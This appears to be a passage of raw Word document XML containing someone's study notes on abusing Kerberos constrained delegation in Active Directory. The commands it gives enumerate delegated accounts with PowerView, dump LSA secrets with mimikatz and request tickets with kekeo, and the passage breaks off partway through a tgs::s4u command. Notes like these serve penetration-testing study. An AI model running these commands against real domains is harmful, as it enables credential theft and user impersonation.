    <w:p w14:paraId="6E81307F" w14:textId="29D5E334" w:rsidR="004D50DA" w:rsidRPr="004D50DA" w:rsidRDefault="004D50DA" w:rsidP="004D50DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D50DA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t xml:space="preserve">Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msDS-AllowedToActOnBehalfOfOtherIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:t>attribute</w:t>
      </w:r>
      <w:r w:rsidRPr="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D667C" w14:textId="5AF2DAC7" w:rsidR="004D50DA" w:rsidRPr="004D50DA" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Constrained Delegation Exploitation</w:t>
      </w:r>
      <w:r w:rsidR="004D50DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09336F29" w14:textId="3BA675B5" w:rsidR="004D50DA" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="00913913">
        <w:t>irst thing we need to do is enumerate available delegations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB7163E" w14:textId="2E26D83E" w:rsidR="004126A1" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-NetUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00913913">
        <w:t> cmdlet of PowerSploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6CE3DF" w14:textId="77777777" w:rsidR="00913913" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\&gt;Import-Module C:\Tools\PowerView.ps1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DCD46B" w14:textId="0FBD4B81" w:rsidR="00913913" w:rsidRPr="00913913" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PS C:\&gt;Get-NetUser -TrustedToAuth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2387E1AB" w14:textId="047AB04A" w:rsidR="00170391" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00170391">
        <w:tab/>
        <w:t>This will give us Delegated Service account and delegated for which services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9EDE0" w14:textId="3AA23517" w:rsidR="004126A1" w:rsidRDefault="00170391" w:rsidP="00517209">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00913913" w:rsidRPr="00913913">
        <w:t>ump LSASecrets</w:t>
      </w:r>
      <w:r w:rsidR="00913913">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00517209" w:rsidRPr="00517209">
        <w:t>for this Delegated service user</w:t>
      </w:r>
      <w:r w:rsidR="00517209">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00913913">
        <w:t>using mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2AA3E3" w14:textId="36360D22" w:rsidR="00913913" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>C:\&gt; C:\Tools\mimikatz_trunk\x64\mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B74B5" w14:textId="2F80C2D8" w:rsidR="004126A1" w:rsidRDefault="00913913" w:rsidP="004126A1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t xml:space="preserve">mimikatz # </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>token::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B041D" w14:textId="32D5901F" w:rsidR="00913913" w:rsidRDefault="00913913" w:rsidP="004126A1">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t xml:space="preserve"> # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB7D7B9" w14:textId="521DD980" w:rsidR="00913913" w:rsidRPr="00913913" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>token::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>elevate - To dump the secrets from the registry hive, we need to impersonate the SYSTEM user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDB8E94" w14:textId="77777777" w:rsidR="00913913" w:rsidRPr="00913913" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>lsadump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">secrets - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00913913">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> interacts with the registry hive to pull the clear text credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D905ED" w14:textId="366287D7" w:rsidR="00913913" w:rsidRDefault="00913913" w:rsidP="00913913">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These steps </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to get credentials for the Delegated Service Account</w:t>
      </w:r>
      <w:r w:rsidR="007B4279">
        <w:t xml:space="preserve"> that we Extract from </w:t>
      </w:r>
      <w:r w:rsidR="007B4279" w:rsidRPr="007B4279">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
        </w:rPr>
        <w:t>Get-NetUser -TrustedToAuth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4148F5EC" w14:textId="1FF1D4FD" w:rsidR="007F33BD" w:rsidRPr="007F33BD" w:rsidRDefault="007F33BD" w:rsidP="007F33BD">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>We should close mimikatz and reopen, Bec we made the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>token::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>elevate command, this will attach our attack to system session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2211C9" w14:textId="1B0D14D2" w:rsidR="007F33BD" w:rsidRPr="007F33BD" w:rsidRDefault="007F33BD" w:rsidP="007F33BD">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:tab/>
        <w:t>If we:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68113478" w14:textId="77777777" w:rsidR="007F33BD" w:rsidRPr="007F33BD" w:rsidRDefault="007F33BD" w:rsidP="007F33BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>token::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716C15F" w14:textId="77777777" w:rsidR="007F33BD" w:rsidRPr="007F33BD" w:rsidRDefault="007F33BD" w:rsidP="007F33BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to inject </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>kirbi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ticket...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F055B4A" w14:textId="6FF1EC86" w:rsidR="007F33BD" w:rsidRPr="007F33BD" w:rsidRDefault="007F33BD" w:rsidP="007F33BD">
      <w:pPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>➡</w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows won't use that ticket for </w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>network authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">, because it's tied to the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>SYSTEM user</w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>, not your current logon session that we need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CC5963" w14:textId="5CAC4344" w:rsidR="007F33BD" w:rsidRPr="007F33BD" w:rsidRDefault="007F33BD" w:rsidP="007F33BD">
      <w:pPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">That means tools </w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:rStyle w:val="code2Char"/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">like dir \\target\c$, RDP, PsExec, or even mssqlclient.py </w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>won’t be able to use the ticket</w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>, because they're running under your normal user context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E0DCF" w14:textId="24EBDD4B" w:rsidR="007F33BD" w:rsidRPr="007F33BD" w:rsidRDefault="007F33BD" w:rsidP="007F33BD">
      <w:pPr>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">When injecting a Kerberos ticket </w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>into the SYSTEM session's ticket cache</w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Normal tools like: RDP, mssqlclient.py will </w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t xml:space="preserve"> use that ticket, because they're running as </w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>your user</w:t>
      </w:r>
      <w:r w:rsidRPr="007F33BD">
        <w:rPr>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>, not as SYSTEM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C20839" w14:textId="1304B1F7" w:rsidR="007F33BD" w:rsidRDefault="007F33BD" w:rsidP="007F33BD">
      <w:pPr>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B395FEB" w14:textId="42E0A6E5" w:rsidR="00913913" w:rsidRDefault="00170391" w:rsidP="00170391">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidR="007B4279" w:rsidRPr="007B4279">
        <w:t>a combination of </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="007B4279" w:rsidRPr="007B4279">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Kekeo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007B4279" w:rsidRPr="007B4279">
        <w:t> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="007B4279" w:rsidRPr="007B4279">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Mimikatz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="02BA48C9" w14:textId="77777777" w:rsidR="00170391" w:rsidRDefault="007B4279" w:rsidP="00170391">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00170391">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>C:\Tools\kekeo\x64\kekeo.exe</w:t>
      </w:r>
      <w:r w:rsidR="00170391">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B1C2A8" w14:textId="3F6F81B9" w:rsidR="00913913" w:rsidRDefault="00170391" w:rsidP="00170391">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00170391">
        <w:t>We first generate a </w:t>
      </w:r>
      <w:r w:rsidRPr="00170391">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TGT</w:t>
      </w:r>
      <w:r w:rsidRPr="00170391">
        <w:t> that can be used to generate tickets for the </w:t>
      </w:r>
      <w:r>
        <w:t>allowed Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDE9A7C" w14:textId="118FC175" w:rsidR="00913913" w:rsidRDefault="00170391" w:rsidP="00727EC8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(As </w:t>
      </w:r>
      <w:r w:rsidR="00727EC8">
        <w:t>we are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Delegated account to </w:t>
      </w:r>
      <w:r w:rsidR="00727EC8">
        <w:t xml:space="preserve">Users, we can ask for our TGT </w:t>
      </w:r>
      <w:r w:rsidR="00727EC8" w:rsidRPr="00727EC8">
        <w:t>that can be used to generate tickets for the </w:t>
      </w:r>
      <w:r w:rsidR="00727EC8">
        <w:t>granted</w:t>
      </w:r>
      <w:r w:rsidR="00727EC8" w:rsidRPr="00727EC8">
        <w:t xml:space="preserve"> services</w:t>
      </w:r>
      <w:r w:rsidR="00727EC8">
        <w:t xml:space="preserve"> that we can be delegated to)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B73D08E" w14:textId="2963E734" w:rsidR="00727EC8" w:rsidRDefault="00727EC8" w:rsidP="00727EC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>suppose</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the services is: HTTP &amp; Wsman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5453BD" w14:textId="7EBC5C84" w:rsidR="00727EC8" w:rsidRDefault="00727EC8" w:rsidP="00727EC8">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t xml:space="preserve">kekeo # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>tgt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>::ask /user:[Delegated-Service-User] /domain:[domain] /password:[password]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6420EE47" w14:textId="04455255" w:rsidR="00727EC8" w:rsidRDefault="00727EC8" w:rsidP="00727EC8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00727EC8">
        <w:t>Now that we have the TG</w:t>
      </w:r>
      <w:r w:rsidR="00945156">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00727EC8">
        <w:t xml:space="preserve"> for the </w:t>
      </w:r>
      <w:r w:rsidR="00945156">
        <w:t xml:space="preserve">victim </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EC8">
        <w:t>account that can perform delegation</w:t>
      </w:r>
      <w:r w:rsidR="00945156">
        <w:t xml:space="preserve"> for it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00727EC8">
        <w:t>we can forge TGS requests for account</w:t>
      </w:r>
      <w:r>
        <w:t>s that</w:t>
      </w:r>
      <w:r w:rsidRPr="00727EC8">
        <w:t xml:space="preserve"> we want to impersonate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00788248" w14:textId="14903AFB" w:rsidR="004126A1" w:rsidRDefault="00727EC8" w:rsidP="00727EC8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="BAC8D4"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
        </w:rPr>
        <w:t>kekeo # tgs::s4u /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="glossary-term"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
